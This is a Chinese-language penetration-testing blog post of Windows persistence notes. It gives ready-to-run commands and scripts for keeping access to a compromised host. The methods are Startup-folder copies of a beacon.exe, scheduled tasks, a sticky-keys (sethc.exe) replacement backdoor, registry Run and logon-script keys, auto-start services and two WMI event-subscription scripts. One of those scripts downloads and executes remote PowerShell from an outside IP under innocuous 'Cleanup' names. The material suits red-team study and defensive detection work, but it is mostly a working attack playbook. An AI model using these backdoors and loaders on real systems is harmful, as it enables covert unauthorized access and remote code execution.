<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Windows,backdoor,">





  <link rel="alternate" href="/atom.xml" title="scareing的学习笔记" type="application/atom+xml">






<meta name="description" content="Windows权限维持笔记.在渗透的过程中及时留后门是一个好习惯，可以有效的避免一些意料之外的断连，毕竟断连后不一定还能再次拿下该主机。 不过记得在达成目的后，及时删除后门。PS：操作均为管理员权限下进行 Windows权限维持主要就是依靠自启动或者后门， 自启动目录copy &amp;quot;C:\beacon.exe&amp;quot; &amp;quot;C:\Users\Administrator\AppDat">
<meta name="keywords" content="Windows,backdoor">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows权限维持笔记.">
<meta property="og:url" content="https://github.com/scareing/scareing.github.io/2019/09/24/Windows权限维持笔记/index.html">
<meta property="og:site_name" content="scareing的学习笔记">
<meta property="og:description" content="Windows权限维持笔记.在渗透的过程中及时留后门是一个好习惯，可以有效的避免一些意料之外的断连，毕竟断连后不一定还能再次拿下该主机。 不过记得在达成目的后，及时删除后门。PS：操作均为管理员权限下进行 Windows权限维持主要就是依靠自启动或者后门， 自启动目录copy &amp;quot;C:\beacon.exe&amp;quot; &amp;quot;C:\Users\Administrator\AppDat">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/08/07/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E7%AC%94%E8%AE%B0/1.jpg">
<meta property="og:updated_time" content="2019-11-23T14:36:13.580Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Windows权限维持笔记.">
<meta name="twitter:description" content="Windows权限维持笔记.在渗透的过程中及时留后门是一个好习惯，可以有效的避免一些意料之外的断连，毕竟断连后不一定还能再次拿下该主机。 不过记得在达成目的后，及时删除后门。PS：操作均为管理员权限下进行 Windows权限维持主要就是依靠自启动或者后门， 自启动目录copy &amp;quot;C:\beacon.exe&amp;quot; &amp;quot;C:\Users\Administrator\AppDat">
<meta name="twitter:image" content="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/08/07/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E7%AC%94%E8%AE%B0/1.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://github.com/scareing/scareing.github.io/2019/09/24/Windows权限维持笔记/">





  <title>Windows权限维持笔记. | scareing的学习笔记</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">scareing的学习笔记</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">道可道，非常道, 名可名，非常名!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://github.com/scareing/scareing.github.io/2019/09/24/Windows权限维持笔记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="scareing">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/Bloglogo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="scareing的学习笔记">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Windows权限维持笔记.</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-24T13:15:45+08:00">
                2019-09-24
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/权限维持/" itemprop="url" rel="index">
                    <span itemprop="name">权限维持</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Windows权限维持笔记"><a href="#Windows权限维持笔记" class="headerlink" title="Windows权限维持笔记."></a>Windows权限维持笔记.</h1><p>在渗透的过程中及时留后门是一个好习惯，可以有效的避免一些意料之外的断连，毕竟断连后不一定还能再次拿下该主机。</p>
<p>不过记得在达成目的后，及时删除后门。<br>PS：操作均为管理员权限下进行</p>
<p><strong>Windows权限维持主要就是依靠自启动或者后门，</strong></p>
<h2 id="自启动目录"><a href="#自启动目录" class="headerlink" title="自启动目录"></a>自启动目录</h2><pre><code>copy &quot;C:\beacon.exe&quot; &quot;C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beacon.exe&quot; /y
这目录里面的东西都会在开机登录入系统后启动。</code></pre><p>** 开机自启动 **</p>
<h2 id="定时任务"><a href="#定时任务" class="headerlink" title="定时任务"></a>定时任务</h2><pre><code>schtasks /create /tn demo /tr &quot;c:\beacon.exe&quot; /sc minute /mo 1
创建一个名为demo的任务，任务内容为每分钟执行一次C盘根目录下的beacon.exe
schtasks /delete /tn WindowsUpdate
删除名为demo的任务</code></pre><p><strong>schtasks可以周期运行，重复检索任务是否处于运行状态，如果任务已经在执行不会重复执行。PS:schtasks可以深度定制。</strong></p>
<h2 id="shift后门"><a href="#shift后门" class="headerlink" title="shift后门"></a>shift后门</h2><pre><code>takeown /f C:\windows\system32\sethc.* /a /r /d y&amp;&amp;cacls C:\windows\system32\sethc.exe /T /E /G system:F&amp;&amp;copy &quot;C:\beacon.exe&quot; C:\windows\system32\sethc.exe /y

把粘滞键的启动程序改为后门程序。</code></pre><p><strong>要求能进入windows锁屏界面，且未关闭shift启动粘滞键，比如可以3389连过去或者能直接接触到。</strong></p>
<h2 id="注册表"><a href="#注册表" class="headerlink" title="注册表"></a>注册表</h2><pre><code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d &quot;C:\beacon.exe&quot; /f

reg add HKEY_CURRENT_USER\Environment\UserInitMprLogonScript /t REG_EXPAND_SZ /d C:\beacon.exe</code></pre><p>第二条启动先于杀软，注册表自启动路径很多，记几种常用的即可<br>** 开机自启动 **</p>
<h2 id="创建服务"><a href="#创建服务" class="headerlink" title="创建服务"></a>创建服务</h2><pre><code>sc create &quot;demo&quot; binpath= &quot;C:\beacon.exe&quot;
sc config &quot;demo&quot; start= auto
创建一个名为demo的自启动服务，服务路径为C:\beacon.exe    </code></pre><p>** 开机自启动 **</p>
<h2 id="WMI"><a href="#WMI" class="headerlink" title="WMI"></a>WMI</h2><h3 id="SEADADDY的修改版"><a href="#SEADADDY的修改版" class="headerlink" title="SEADADDY的修改版"></a>SEADADDY的修改版</h3><blockquote>
<p>其中，事件过滤是从PowerSploit的持久化模块，用于在系统启动时触发，事件处理则以SYSTEM权限执行一个程序</p>
</blockquote>
<pre><code>$filterName = &apos;BotFilter82&apos;
$consumerName = &apos;BotConsumer23&apos;
$exePath = &apos;C:\Windows\System32\evil.exe&apos;
$Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &apos;Win32_PerfFormattedData_PerfOS_System&apos; AND TargetInstance.SystemUpTime &gt;=200 AND TargetInstance.SystemUpTime &lt; 320&quot;
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace &quot;root\subscription&quot; -Arguments @{Name=$filterName;EventNameSpace=&quot;root\cimv2&quot;;QueryLanguage=&quot;WQL&quot;;Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace &quot;root\subscription&quot; -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace &quot;root\subscription&quot; -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}</code></pre><h3 id="klion大佬blog"><a href="#klion大佬blog" class="headerlink" title="klion大佬blog"></a>klion大佬blog</h3><blockquote>
<p>administrator账户登录才会触发</p>
</blockquote>
<pre><code>&lt;#
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence.  This script is an adaptation of his work.
#&gt;

function Install-Persistence{

$Payload = &quot;&lt;strong&gt;((new-object net.webclient).downloadstring(&apos;http://172.22.35.241/demo.txt&apos;))&lt;/strong&gt;&quot;
$EventFilterName = &apos;Cleanup&apos;
$EventConsumerName = &apos;DataCleanup&apos;
$finalPayload = &quot;&lt;strong&gt;powershell.exe -nop -c `&quot;IEX $Payload`&quot;&lt;/strong&gt;&quot;

# Create event filter
$EventFilterArgs = @{
    EventNamespace = &apos;root/cimv2&apos;
    Name = $EventFilterName
    Query = &quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &apos;Win32_PerfFormattedData_PerfOS_System&apos; AND TargetInstance.SystemUpTime &gt;= 240 AND TargetInstance.SystemUpTime &lt; 325&quot;
    QueryLanguage = &apos;WQL&apos;
}

$Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs

# Create CommandLineEventConsumer
$CommandLineConsumerArgs = @{
    Name = $EventConsumerName
    CommandLineTemplate = $finalPayload
}
$Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandLineConsumerArgs

# Create FilterToConsumerBinding
$FilterToConsumerArgs = @{
    Filter = $Filter
    Consumer = $Consumer
}
$FilterToConsumerBinding = Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs

#Confirm the Event Filter was created
$EventCheck = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter &quot;Name = &apos;$EventFilterName&apos;&quot;
if ($EventCheck -ne $null) {
    Write-Host &quot;Event Filter $EventFilterName successfully written to host&quot;
}

#Confirm the Event Consumer was created
$ConsumerCheck = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter &quot;Name = &apos;$EventConsumerName&apos;&quot;
if ($ConsumerCheck -ne $null) {
    Write-Host &quot;Event Consumer $EventConsumerName successfully written to host&quot;
}

#Confirm the FiltertoConsumer was created
$BindingCheck = Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding -Filter &quot;Filter = &quot;&quot;__eventfilter.name=&apos;$EventFilterName&apos;&quot;&quot;&quot;
if ($BindingCheck -ne $null){
    Write-Host &quot;Filter To Consumer Binding successfully written to host&quot;
}

}

function Remove-Persistence{
$EventFilterName = &apos;Cleanup&apos;
$EventConsumerName = &apos;DataCleanup&apos;

# Clean up Code - Comment this code out when you are installing persistence otherwise it will

$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter &quot;Name = &apos;$EventConsumerName&apos;&quot;
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter &quot;Name = &apos;$EventFilterName&apos;&quot;
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query &quot;REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding&quot;

$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject

}

function Check-WMI{
Write-Host &quot;Showing All Root Event Filters&quot;
Get-WmiObject -Namespace root/subscription -Class __EventFilter

Write-Host &quot;Showing All CommandLine Event Consumers&quot;
Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer

Write-Host &quot;Showing All Filter to Consumer Bindings&quot;
Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding
}</code></pre><p><img src="https://raw.githubusercontent.com/scareing/scareing.github.io/master/2019/08/07/Windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81%E7%AC%94%E8%AE%B0/1.jpg" alt="avatar"></p>
<p>​     </p>

      
    </div>
    
    
    
    <div>
          
            
          
    </div>

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    scareing
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://github.com/scareing/scareing.github.io/2019/09/24/Windows权限维持笔记/" title="Windows权限维持笔记.">https://github.com/scareing/scareing.github.io/2019/09/24/Windows权限维持笔记/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Windows/" rel="tag"># Windows</a>
          
            <a href="/tags/backdoor/" rel="tag"># backdoor</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/09/10/命令行文件下载的各种姿势/" rel="next" title="命令行文件下载的各种姿势">
                <i class="fa fa-chevron-left"></i> 命令行文件下载的各种姿势
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/05/利用C#byass AV/" rel="prev" title="《使用C＃编写自定义后门负载》学习笔记及免杀尝试">
                《使用C＃编写自定义后门负载》学习笔记及免杀尝试 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/Bloglogo.jpg" alt="scareing">
            
              <p class="site-author-name" itemprop="name">scareing</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/scareing" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:scareing@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Windows权限维持笔记"><span class="nav-number">1.</span> <span class="nav-text">Windows权限维持笔记.</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#自启动目录"><span class="nav-number">1.1.</span> <span class="nav-text">自启动目录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#定时任务"><span class="nav-number">1.2.</span> <span class="nav-text">定时任务</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#shift后门"><span class="nav-number">1.3.</span> <span class="nav-text">shift后门</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#注册表"><span class="nav-number">1.4.</span> <span class="nav-text">注册表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建服务"><span class="nav-number">1.5.</span> <span class="nav-text">创建服务</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WMI"><span class="nav-number">1.6.</span> <span class="nav-text">WMI</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SEADADDY的修改版"><span class="nav-number">1.6.1.</span> <span class="nav-text">SEADADDY的修改版</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#klion大佬blog"><span class="nav-number">1.6.2.</span> <span class="nav-text">klion大佬blog</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">scareing</span>

  
</div>









        







        
      </div>
    </footer>

    

    

    
       <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;"></canvas> 
       <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
       <script type="text/javascript" src="/js/src/fireworks.js"></script>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
